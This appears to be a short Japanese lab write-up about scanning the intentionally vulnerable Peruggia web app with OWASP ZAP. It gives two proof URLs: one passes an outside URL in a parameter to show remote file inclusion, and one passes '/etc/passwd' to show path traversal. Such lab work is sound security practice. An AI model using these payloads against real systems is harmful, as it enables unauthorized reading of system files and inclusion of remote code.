Hello there, ('ω')ノ
PeruggiaをOWASP ZAPでアクティブスキャンして。
SQLiとXSS以外で危険度の高い脆弱性について検証してみることに。
ZAPでもBurp Suiteで検出されたリモートファイルインクルージョンを発見して。
下記のURLを入力すると確認できて。
http://192.168.1.82/peruggia/index.php?action=learn&paper=http%3A%2F%2Fwww.google.com%2F&type=BoF
もう一つ、パストラバーサルも検出できたようで。
こちらも下記のURLを入力して確認して。
http://192.168.1.82/peruggia/index.php?action=learn&paper=%2Fetc%2Fpasswd&type=BoF
Best regards, (^^ゞ